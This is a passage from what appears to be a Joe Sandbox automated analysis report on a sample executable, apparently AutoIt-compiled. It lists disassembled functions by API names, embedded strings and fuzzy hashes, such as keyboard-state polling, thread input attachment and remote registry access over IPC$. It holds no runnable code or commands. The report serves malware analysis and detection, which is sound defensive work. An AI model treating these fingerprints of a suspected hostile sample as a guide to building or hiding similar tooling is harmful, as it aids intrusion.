                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 4010642439-1241985126
                                                            • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                            • Instruction ID: 796ea267150d73acf3ca345958cb1d2ae26c01175ab55a7566ec9ba2ebc545f7
                                                            • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                            • Instruction Fuzzy Hash: D2A1A122A086C383EF24AB25F4546F9E7A1FB85784F894035DA8E53A95DF3DF905CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                            • String ID: P
                                                            • API String ID: 1268354404-3110715001
                                                            • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                            • Instruction ID: 2aaaf480eda64f7c08645d41b08626a7e3a1fc2580e26de3db82777a64905313
                                                            • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                            • Instruction Fuzzy Hash: 6661C236E086828AEF14FF25E8506F9A791FB84B98F980535DE1E477A4DF3CE4418720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: LoadStringwprintf
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 3297454147-2391861430
                                                            • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                            • Instruction ID: 1d296051ec19d80a67e85a0e10f58d195159d933533f6145df76a57d906b79bd
                                                            • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                            • Instruction Fuzzy Hash: 59715D62F18AD296EF40FB61E8444EDA720FB80784FC80432EA4D17699EF7CE506C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 3030280669-22481851
                                                            • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                            • Instruction ID: 3a20bee1ebb4e26998e8664f1c663b111c6db07e863583fc16f6321595b5178e
                                                            • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                            • Instruction Fuzzy Hash: 7951A422B18AC395EF10FB65F8945EDA760FB94784F880031EA4D47A69EF3CD546C750
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                            • String ID: static
                                                            • API String ID: 3821898125-2160076837
                                                            • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                            • Instruction ID: 05d4f30bfa67177ee1391149088a9695324b992ae707570aa2237e11a70654b4
                                                            • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                            • Instruction Fuzzy Hash: E2415C326087C187EB60AF25B85479AB7A1FB88790F944239DB9D43B98CF3CD445CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 3827137101-3457252023
                                                            • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                            • Instruction ID: 677c5f7beae935393244117f8344224e80181f321e934025e577e27c68ba357b
                                                            • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                            • Instruction Fuzzy Hash: D44181226186C385EB20AF21F8446FDA3A0FF95798F980135DA4D47AA8DF7CD646C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                            • Instruction ID: 2c202da66587e410e2874dce225e3974a393154a0e7b3e6516f9b63ffd9061fe
                                                            • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                            • Instruction Fuzzy Hash: D7415222D0C6C695FF71AB60B4443F9AAA0EB15B84F8C4979D78E076C2CF5DAC948371
                                                            APIs
                                                              • Part of subcall function 00007FF75F146838: CreateFileW.KERNELBASE ref: 00007FF75F1468A2
                                                              • Part of subcall function 00007FF75F164380: GetCurrentDirectoryW.KERNEL32(?,00007FF75F14E817), ref: 00007FF75F16439C
                                                              • Part of subcall function 00007FF75F1456D4: GetFullPathNameW.KERNEL32(?,00007FF75F1456C1,?,00007FF75F147A0C,?,?,?,00007FF75F14109E), ref: 00007FF75F1456FF
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF75F14E8B0
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF75F14E9FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 2207129308-1018226102
                                                            • Opcode ID: 4ff6fe4801a6e8dcbe3d0805abec616539b723cf49e4c56242313aef72532f37
                                                            • Instruction ID: d9c7c4268b70dd27211b755932804cbd04d81cd02f406e83ff5e23a2848dc543
                                                            • Opcode Fuzzy Hash: 4ff6fe4801a6e8dcbe3d0805abec616539b723cf49e4c56242313aef72532f37
                                                            • Instruction Fuzzy Hash: E5129F22A086C286EF10FB25E4445FEE761FB84794FD80132EA4E47A9AEF7CD505C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 636576611-1287834457
                                                            • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                            • Instruction ID: 4afcbc7f506aedeae110c488886495d91a8a491cf4916827aaf45b44315a606d
                                                            • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                            • Instruction Fuzzy Hash: 99714B22A08B8685EF54AF26E4501FDA7B0FB84B98F985432DE0E87765DF3DE445C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                            • String ID: 5$Ping
                                                            • API String ID: 1486594354-1972892582
                                                            • Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                            • Instruction ID: 3505af2aee2e6ef08a9b23548eafe903295ac886f9040cfbe3197ac6f02b4bd9
                                                            • Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                            • Instruction Fuzzy Hash: F8718D62A086C282EF60FB15E4943BDA7A0FF84B90F998532DA5E87791DF7CD5418720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                            • Instruction ID: a798f232f18c6f9bff848bdf1925bf676fa9cab6be22252c357828deb3822a61
                                                            • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                            • Instruction Fuzzy Hash: 0041AC32A06B8589FB10DB25F8517E973A4FB08398F884135EE5C07B99DF38D425C364
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleStringwprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 4007322891-4153970271
                                                            • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                            • Instruction ID: bcc13dabb98f30165b355baf5f8d2bd5c29218e70a57083bcde9f3f5d7098efc
                                                            • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                            • Instruction Fuzzy Hash: 91314A72A18AC292EF10FB21F8459EDA360FB94B84FC84432EA4D43699DF3CD506C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2573188126-1403004172
                                                            • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                            • Instruction ID: 2cad5b2bd06e9ada478ac2fd784559ce6bcf6f3493eb9e54fb7f16b896b0ecc9
                                                            • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                            • Instruction Fuzzy Hash: 88319075A09AC182EF10BB11F8541E9A761FF89BE0F884231DBAD077D6DF2CD5068760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 2479661705-3771769585
                                                            • Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                            • Instruction ID: 7592ba0ac86835763d72d2a4fc5cd948747048ab0c057cd065bbec4390359c72
                                                            • Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
                                                            • Instruction Fuzzy Hash: 34215E21A089C281EE24BB11F9443FDE360EF94BD0FC84136D64E46AA5DF2CD949C324
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                            • String ID:
                                                            • API String ID: 2672075419-0
                                                            • Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                            • Instruction ID: 2fd4b97a68b5f6fec6a8cd782ec83ec12c91d7e86e0545a5cd997412b7e19b5e
                                                            • Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
                                                            • Instruction Fuzzy Hash: 68919F76B086928AEF50EF71E4843FDA3A1EB44B88F984035DE0D53689CF39E4468730
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                            • Instruction ID: 6cced89132ef69b55086fb8dc626b532f14890068cb120f36480c6db1de5aff7
                                                            • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                            • Instruction Fuzzy Hash: B9315775B0868287EB50AB29B984679F2A2AB58750FD84134CD0F87794DF3DEC468720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 685491774-0
                                                            • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                            • Instruction ID: 8afb2e3adf49b76c4e2bf1519b3d3ec7b8fd4c1a0051487eb65fba46a0ac3018
                                                            • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                            • Instruction Fuzzy Hash: 8211A235B0568282FB04BB76B8985ED6661AFCCB80F895038CA4E8BB50DF3DD0568370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 0-1603158881
                                                            • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                            • Instruction ID: 9ed74efed3221f0e109a2a59a1334366470cafb74f0b46c3d19b9814e8018ec6
                                                            • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                            • Instruction Fuzzy Hash: E312D562B1A6C352FE68BB31E8156F9E290BF54784FCC4131DA5E86294EF3CE554C2B0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Variant$Init$Clear
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                            • API String ID: 3467423407-1765764032
                                                            • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                            • Instruction ID: 5d574ef8050665f94c61330270e04986c92f3f9e79611c95026f776be6efde9b
                                                            • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
